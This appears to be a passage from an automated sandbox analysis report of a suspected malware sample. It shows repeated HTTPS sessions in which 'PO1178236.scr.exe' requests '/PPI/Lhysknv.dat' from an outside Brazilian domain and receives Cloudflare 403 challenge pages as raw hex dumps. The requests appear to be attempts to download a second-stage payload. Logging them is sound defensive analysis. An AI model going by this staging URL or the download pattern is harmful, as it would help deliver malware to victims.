        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVqncW13PoBrPLqEUCNR4w%2FRdrr4WDAJB88IUisrT%2BfZNmNojCIDCzMeFrgvU80iEOCHmXNraPGRDCvhQzfc66mGjcgptoK84qdDFbR9GosHef6M8LArLcCfmy3HgVQKrT4yMydeUEaoTS4v"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2ae2a0b4244-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1714&rtt_var=655&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1655328&cwnd=221&unsent_bytes=0&cid=13eea5df2ee57d96&ts=129&x=0"
        2025-01-09 07:37:10 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:10 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:37:10 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:37:10 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 61 65 32 61 30 62 34 32 34 34 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2ae2a0b4244</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:37:10 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 61 65 32 61 30 62 34 32 34 34 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2ae2a0b4244',t:'MTczNjQwODIzMC4wMDAwMDA='};var a=d
        2025-01-09 07:37:10 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        120192.168.2.949829188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:10 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:10 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:10 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:25 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drxyGZyIlH1gnzbSmcIlgBWdYX2i27zLdd2ez9p5CfYjm%2F9TlAHSQ0YL0S4rhlxM%2Fa8HddBa5yHTO%2B7PVeqFt0QhyROWzwWcx9G7ez0hzX9TyItChw08z2zBta9buY3yhWJPjnZ0DPajR5PZ"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2b2192b4314-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1569&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1775075&cwnd=188&unsent_bytes=0&cid=4f52aa617e906353&ts=148&x=0"
        2025-01-09 07:37:10 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:10 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:37:10 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:37:10 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 62 32 31 39 32 62 34 33 31 34 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2b2192b4314</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:37:10 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 62 32 31 39 32 62 34 33 31 34 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2b2192b4314',t:'MTczNjQwODIzMC4wMDAwMDA='};var a
        2025-01-09 07:37:10 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        121192.168.2.949830188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:11 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:11 UTC1001INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:11 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:26 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7CX3xgR9OV49TtChwKiLp30r440tKmtzf9PORXsiR5rPlt290HPXkaMzOM9L7kFgjhpOPgcg9utF43ekkeUCdqude1ksFuYr6e1RVIocLx53zTw0Tg31ShigWeH%2BvgT4mqf4fbP7ZsOBFxG"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2b5cfe9de92-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1663&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1720683&cwnd=239&unsent_bytes=0&cid=9a3af75fb8a3e9fe&ts=134&x=0"
        2025-01-09 07:37:11 UTC368INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:11 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77
        Data Ascii: /title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-w
        2025-01-09 07:37:11 UTC1369INData Raw: 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63
        Data Ascii: ghlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-c
        2025-01-09 07:37:11 UTC1369INData Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 62 35 63 66 65 39 64 65 39 32 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c
        Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2b5cfe9de92</strong></span> <span class="cf-footer-separator sm:hidden">&bul
        2025-01-09 07:37:11 UTC994INData Raw: 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 62 35 63 66 65 39 64 65 39 32 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63
        Data Ascii: cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2b5cfe9de92',t:'MTczNjQwODIzMS4wMDAwMDA='};var a=doc
        2025-01-09 07:37:11 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        122192.168.2.949831188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:11 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:11 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:11 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:26 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jb82k7oqzAaoGRQHh9o%2FATWV0vTAO8aeE%2FmTQmXALcJQ1IhX9uF7j8wBWiCFa8FZ%2F14HBZ%2F77OM4RSkbI1S5B0unq6yKLssnPiHj6St%2BjNaYiZdfNDaCl9WOsJSzyNQGRS5oVDnvCp%2FDfuKJ"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2b96bce18bc-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1630&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1737061&cwnd=250&unsent_bytes=0&cid=12ddeeebbe9ea28c&ts=125&x=0"
        2025-01-09 07:37:11 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
